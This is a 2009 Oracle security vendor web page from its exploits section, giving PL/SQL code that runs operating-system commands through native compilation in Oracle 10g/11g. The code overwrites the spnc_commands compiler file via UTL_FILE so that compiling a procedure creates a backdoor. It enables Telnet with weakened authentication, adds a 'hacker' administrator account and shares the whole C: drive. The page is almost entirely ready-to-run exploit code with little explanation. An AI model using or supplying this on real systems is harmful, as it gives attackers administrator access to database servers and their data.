Products
Repscan 2.5
Hedgehog Enterprise
Checkpwd (free)
Services
Oracle Audit / Hardening
Security Training
Consulting
Information
Oracle Security Blog
Published Alerts
Upcoming Alerts
Patch Information
Whitepaper
Presentations
Oracle Fact Sheets
Exploits
Tutorials
Videos
Scripts
News & Events
Events
News
Company
Contact
People
Partner
Impressum
Sitemap
Search
Run OS commands via PL/SQL Native (10g / 11g)
Idea by Alexander Kornbrust (undocumented)
Requirements
- execute on UTL_FILE or execute on DBMS_ADVISOR + advisor privilege
- CREATE ANY DIRECTORY
Modify the text file located in $ORACLE_HOME/plsql/spnc_commands. This file contains the compiler settings in 10g / 11g.
Code:
sqlplus system/manager
-- adjust the Oracle Home directory
--
--
create directory T as 'C:\ORACLE\ORA102\PLSQL';
DECLARE
v_file UTL_FILE.FILE_TYPE;
BEGIN
begin
utl_file.Fcopy('T','spnc_commands','T','spnc_commands2');
end;
v_file := UTL_FILE.FOPEN('T','spnc_commands', 'w');
UTL_FILE.PUT_LINE(v_file,'cmd.exe /c echo sc config "TlntSvr" start= auto> c:\open.cmd');
UTL_FILE.PUT_LINE(v_file,'cmd.exe /c echo sc start "TlntSvr">> c:\open.cmd');
UTL_FILE.PUT_LINE(v_file,'cmd.exe /c echo tlntadmn config sec=-NTLM>> c:\open.cmd');
UTL_FILE.PUT_LINE(v_file,'cmd.exe /c echo tlntadmn config mode=stream>> c:\open.cmd');
UTL_FILE.PUT_LINE(v_file,'cmd.exe /c echo net user hacker hacker /add>> c:\open.cmd');
UTL_FILE.PUT_LINE(v_file,'cmd.exe /c echo net localgroup TelnetClients /add>> c:\open.cmd');
UTL_FILE.PUT_LINE(v_file,'cmd.exe /c echo net localgroup Administrator hacker /add>> c:\open.cmd');
UTL_FILE.PUT_LINE(v_file,'cmd.exe /c echo net localgroup Administrators hacker /add>> c:\open.cmd');
UTL_FILE.PUT_LINE(v_file,'cmd.exe /c echo net localgroup TelnetClients hacker /add>> c:\open.cmd');
UTL_FILE.PUT_LINE(v_file,'cmd.exe /c echo net share system=C:\ /unlimited>> c:\open.cmd');
UTL_FILE.PUT_LINE(v_file,'cmd.exe /c call c:\open.cmd');
UTL_FILE.FCLOSE(v_file);
END;
/
-- start the command file we created before
alter session set plsql_compiler_flags='NATIVE';
alter system set plsql_native_library_dir='C:\';
create or replace procedure h1 as begin
null;
end;
/
© 2009 by Red-Database-Security GmbH - last update 20-apr-2009